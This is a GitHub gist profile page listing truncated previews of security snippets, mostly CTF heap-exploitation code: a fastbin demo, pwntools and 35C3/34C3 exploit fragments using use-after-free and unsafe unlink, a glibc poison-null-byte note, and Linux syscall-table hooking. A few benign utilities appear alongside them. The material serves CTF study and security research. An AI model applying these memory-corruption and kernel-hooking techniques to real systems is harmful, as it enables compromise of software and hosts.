Skip to content

Instantly share code, notes, and snippets.

Avatar
😸
writing happy exploits

Duc Phan ducphanduyagentp

😸
writing happy exploits
View GitHub Profile
View fastbin.c
#include <stdio.h>
#include <stdlib.h>
#define chunksize 0x8
#define fakesize 0x20
#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)
#define MIN_CHUNK_SIZE 24 /* 64 bit system */
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */
View gist:5ca684664ab979e2660a0302806edce9
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from pwn import *
import re
import sys
import string
import itertools
# UAF in IndexCursor
@ducphanduyagentp
ducphanduyagentp / exp.py
Created Dec 30, 2018 — forked from hama7230/exp.py
35C3 CTF collection
View exp.py
# import Collection
bytearray = ().__class__.__base__.__subclasses__()[5]
def p64(addr):
x = '{0:016x}'.format(addr)
return bytearray.fromhex(x)[::-1]
b = Collection.Collection({'1':0x1337})
libc_base = id(b) + 0xe27198 - 0x13e0dd0
@ducphanduyagentp
ducphanduyagentp / 300.py
Created Dec 28, 2018 — forked from sroettger/300.py
One solution for the 34c3ctf's 300 heap challenge.
View 300.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300.
# You could free allocations and read/write to them even after they got freed.
# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques.
# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore.
# Afterwards we can get a write-what-where primitive using unsafe unlink.
View Poison-NullByte-Bypass-Latest.md

Poison Null Byte Patched (or maybe not)

--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -4281,6 +4281,8 @@ _int_free (mstate av, mchunkptr p, int have_lock)
       prevsize = prev_size (p);
       size += prevsize;
       p = chunk_at_offset(p, -((long) prevsize));
+ if (__glibc_unlikely (chunksize(p) != prevsize))
@ducphanduyagentp
ducphanduyagentp / checkaslr.py
Created Aug 4, 2018 — forked from wdormann/checkaslrfiles.py
Python script to check for PE files linked with /DYNAMICBASE, but are not actually ASLR compatible due to missing relocation table
View checkaslr.py
'''checkaslr.py: Check for files that opt into ASLR with /DYNAMICBASE,
but do not have a relocation table to allow ASLR to function.
usage: checkaslr.py <dir>
ex: checkaslr.py "C:\Program Files\"
requires: pefile <https://github.com/erocarrera/pefile>, which should be
installable via: pip install pefile
'''
@ducphanduyagentp
ducphanduyagentp / Makefile
Created Jun 22, 2017 — forked from ilammy/Makefile
Linux kernel system call table hooking
View Makefile
obj-m += afw.o
afw-objs := afw_main.o locate_sct.o ttgl.o
ccflags-y := -std=gnu99 -O2
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
View simple-https-server.py
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
@ducphanduyagentp
ducphanduyagentp / tweet_dumper.py
Created Dec 19, 2016 — forked from yanofsky/LICENSE
A script to download all of a user's tweets into a csv
View tweet_dumper.py
#!/usr/bin/env python
# encoding: utf-8
import tweepy #https://github.com/tweepy/tweepy
import csv
#Twitter API credentials
consumer_key = ""
consumer_secret = ""
access_key = ""